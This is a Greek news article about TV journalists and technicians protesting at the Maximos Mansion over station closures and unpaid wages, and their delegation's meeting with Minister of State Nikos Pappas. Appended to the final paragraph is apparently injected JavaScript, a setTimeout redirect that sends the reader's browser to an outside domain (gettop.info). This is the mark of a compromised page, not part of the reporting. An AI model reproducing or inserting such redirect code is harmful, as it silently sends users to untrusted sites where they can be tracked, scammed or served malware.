Σήκωσαν πανό μπροστά στο Μέγαρο Μαξίμου – «Το μαύρο δεν έχει αποχρώσεις»- «Έκλεισε» συνάντηση με τον πρωθυπουργό

0
40

 

«Το μαύρο δεν έχει αποχρώσεις», είναι το σύνθημα του πανό που ύψωσαν στα κάγκελα του Μέγαρου Μαξίμου δημοσιογράφοι και τεχνικοί που εράζονται στους ιδιωτικούς τηλεοπτικούς σταθμούς πανελλήνιας εμβέλειας.
mavro1

Αρχικά είχαν συγκεντρωθεί είχαν συγκεντρωθεί μπροστά  στη Βουλή, αλλά στη συνέχεια  κατάφεραν να σπάσουν τον αστυνομικό κλοιό της οδού Ηρώδου Αττικού και να φτάσουν μπροστά από το Μέγαρο Μαξίμου. Οι άνδρες των ΜΑΤ προσπάθησαν να εμποδίσουν τους διαδηλωτές να περάσουν -ορισμένοι, μάλιστα, τους απώθησαν και τράβηξαν από τα χέρια τους τα πανό που κρατούσαν.

mavro

Οι αστυνομικοί προσπάθησαν να βάλουν κλούβες μπροστά από την Ηρώδου Αττικού πριν περάσουν οι εργαζόμενοι, χωρίς όμως αποτέλεσμα.

Αντιπροσωπεία των διαδηλωτών συναντήθηκε με τον υπουργό Επικρατείας Νίκο Παππά. Αμέσως μετά τη συνάντηση, οι εκπρόσωποι των εργαζομένων ανακοίνωσαν στους εργαζόμενους ότι η κυβέρνηση δεσμεύθηκε να γίνει άμεσα συνάντηση με τον πρωθυπουργό. Επίσης με πρωτοβουλία της κυβέρνησης αναμένεται να γίνει τριμερής συνάντηση ανάμεσα σε εργοδότες, εργαζόμενους και κυβέρνηση, με στόχο να μην πέσει «μαύρο» και να διασφαλιστούν οι θέσεις εργασίας.

mavro2

Επίσης, με πρόταση του προέδρου της ΠΟΣΠΕΡΤ θα εξεταστεί το ενδεχόμενο να απορροφηθούν ορισμένοι άνεργοι. Ο πρόεδρος της ΕΤΙΤΑ ζήτησε από τον υπουργό Επικρατείας ειδικά για την περίπτωση του Mega να αποδεσμευθούν τραπεζικοί λογαριασμοί για να πληρωθούν οι εργαζόμενοι του τηλεοπτικού σταθμού που παραμένουν απλήρωτοι από τον Μάιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here